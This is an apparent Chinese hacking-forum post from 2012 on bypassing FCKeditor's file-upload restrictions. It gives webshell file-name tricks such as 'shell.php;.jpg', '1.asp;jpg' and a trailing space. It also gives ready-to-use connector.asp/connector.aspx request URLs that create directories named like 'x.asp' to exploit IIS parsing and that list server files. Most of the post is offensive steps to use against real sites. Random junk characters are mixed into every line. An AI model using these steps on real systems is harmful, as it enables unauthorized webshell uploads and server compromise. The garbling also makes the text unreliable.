很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
' y u6 j' s* w
1 s. g& r2 S/ }6 f提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。. h1 B" @* H7 k6 B) U
/ ^$ w7 S, n4 o) \继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
4 N6 J7 n; b+ a5 E% ~, F# a/ B/ o7 e' G. [' t. y3 f
突破建立文件夹:$ H2 M0 y; n: v( {7 C$ K0 f
- c @; B8 ^- g8 Peditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp$ Z* N! w. {1 W. o$ k
# h" G3 q3 P" ~9 c' {* ^3 j
参数:# t7 ~% F$ T; [/ U0 `' d9 D& |
7 A |' k. v2 p2 C2 f: ^6 e* s当前目录名:CurrentFolder=/qing.asp* m8 n% y& c# v8 I% L
9 C% C0 S6 l* A( y- t- Y( P
新的目录名:NewFolderName=x.asp5 n' Y7 h& v7 h0 ^8 x% Q, M
# T2 _& e8 v e$ E7 _其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……( S3 J/ `+ p% f# L+ `
8 ^& d) O! V# h b7 A8 J那么 x.asp 就已经建立生成了,此方法百试百灵!+ x3 J* T2 Y/ @5 q
1 G7 ?3 M V Z& i- _4 i5 o( |
新建文件夹参数 x.asp,基本都能搞定。
( @5 H2 }* _& U1 U
2 r8 K2 k: q' }. V0 n下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建( J* F7 E$ Y4 A/ K+ P. w5 X
6 ?; S6 {" `+ k* Vaspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
( N9 A7 @' S: x( _" R+ C
- C2 m+ i! O6 Q3 u% g获取文件列表
5 I8 \( G; S3 p) Z0 V aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
8 r; Y! q( o4 z* E/ K+ _# P, W4 F" s E* g4 ?( A. r. g! H
|
发表于 2012-12-31 09:27:09
收藏
支持
反对